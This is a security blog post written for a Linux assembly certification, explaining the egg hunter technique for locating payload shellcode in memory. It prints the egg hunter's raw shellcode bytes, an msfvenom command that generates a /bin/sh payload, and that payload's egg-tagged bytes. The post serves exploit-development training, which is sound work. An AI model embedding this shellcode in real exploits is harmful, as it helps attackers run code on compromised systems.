Yaksas Security

Cyber Security Research

  • Yaksas Security Home
  • Home
  • Yaksas Security Classroom
  • Learn Adversary Emulation
  • Contact Yaksas
SLAE: Assignment #3

Uday Mittal January 22, 2019 Leave a Comment

SLAE: Assignment #3

Assignment Task:

  • Study about the Egg Hunter shellcode
  • Create a working demo of the Egghunter
  • Should be configurable for different payloads

About Egg Hunters

Egg Hunter is a mechanism to locate a piece of code in an application’s Virtual Address Space (VAS). This technique is primarily used in exploits where the accessible buffer space is insufficient for the payload shellcode to be placed. The Egg Hunter works in following manner:

  • The payload shellcode is prepended with a tag, aka Egg, twice and stored in the VAS.
  • The Egg Hunter shellcode then executes and locates this pattern of EGGEGG. It continously scans memory addresses until this pattern is found.
  • Once found, it transferes the control to the payload shellcode.

The Egg Hunter shellcode should be robust, small and fast.

Egg Hunter Shellcode

For the purpose of this article, I will be using the sigaction egg hunter code mentioned in this paper. This egg hunter code uses sigaction syscall to validate the given address. This approach allows multiple addresses to be validated at a single time by taking advantage of the kernel’s verify_area routine:

sigaction egg hunter code

NASM file with above code can be found here

Objdump output after assembling and linking it:

Commnad: objdump ./egg-hunter.o -d -M intel
Objdump output for egg-hunter.nasm

Generating shellcode from this file:

Egg hunter shellcode:

"\x31\xc9\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8\x90\x50\x90\x50\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7"

Executing the egg hunter

Testing this shellcode with the run_shellcode.c file available here. The run_shellcode file contails two variables, one storing the egg hunter shellcode and the other storing the payload shellcode. The payload shellcode was generated using this command:

msfvenom  -p linux/x86/exec CMD=/bin/sh -b '\x00' -f c
Generating payload shellcode from msfvenom

Payload shellcode prepended with egg:

"\x90\x50\x90\x50\x90\x50\x90\x50\xdd\xc6\xd9\x74\x24\xf4\x58\xbf\xe3\xba\x46\x85\x29\xc9\xb1\x0b\x31\x78\x1a\x83\xe8\xfc\x03\x78\x16\xe2\x16\xd0\x4d\xdd\x41\x77\x34\xb5\x5c\x1b\x31\xa2\xf6\xf4\x32\x45\x06\x63\x9a\xf7\x6f\x1d\x6d\x14\x3d\x09\x65\xdb\xc1\xc9\x59\xb9\xa8\xa7\x8a\x4e\x42\x38\x82\xe3\x1b\xd9\xe1\x84"

Compiling and executing this file:

Executing Egg hunter and payload shellcode

Github repository for this assignment: Assignment 3

————————

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

https://www.pentesteracademy.com/course?id=3

Student ID: SLAE-897

Related Posts

  • Book Review: Ethical HackingBook Review: Ethical Hacking
  • ADSISearcher (Part 2)ADSISearcher (Part 2)
mm
Uday Mittal

Uday Mittal is a cybersecurity professional with rich working experience working with various industries including telecom, publishing, consulting and finance. He holds internationally recognized certifications such as CRTP, OSCE, OSCP, CISSP, CISA, CISM, CRISC among others. He speaks on cybersecurity awareness, offensive security research etc. and has authored various articles on topics related to cyber security and software development for a leading magazine on open source software.

Filed Under: Skills Development, SLAE

Optin Form

Search

Follow us on Twitter

My Tweets

Categories

Tags

(ISC)2 Active directory adsecurity adsi adsisearcher adversary emulation Android attack active directory awareness blue whale challenge Certification CISSP Cloud security crte crtp cyber-warfare cybersecurity Cyber Security Cybersecurity books domain enumeration ethical hacking forest enumeration hacker Information Security ISACA Kali Linux Mobile Security Narendra Modi NSA offensive security Online Safety opsec Password Penetration Testing pentest powersploit Powerview privacy red team red teaming Risk Management Social Engineering user enumeration Wifi Windows

Top Posts

  • Mona.py for exploit devs: 6 must know commands
    Mona.py for exploit devs: 6 must know commands
  • What is Adversary Emulation?
    What is Adversary Emulation?
  • Build Your Career in Cyber Security
    Build Your Career in Cyber Security
  • CISA: Everything You Need to Know
    CISA: Everything You Need to Know
  • Let there be no more MMS Scandals
    Let there be no more MMS Scandals
  • 7 Ways to Cover Your Device's Camera
    7 Ways to Cover Your Device's Camera

© Copyright 2020 ElliteDevs · All Rights Reserved · Powered by WordPress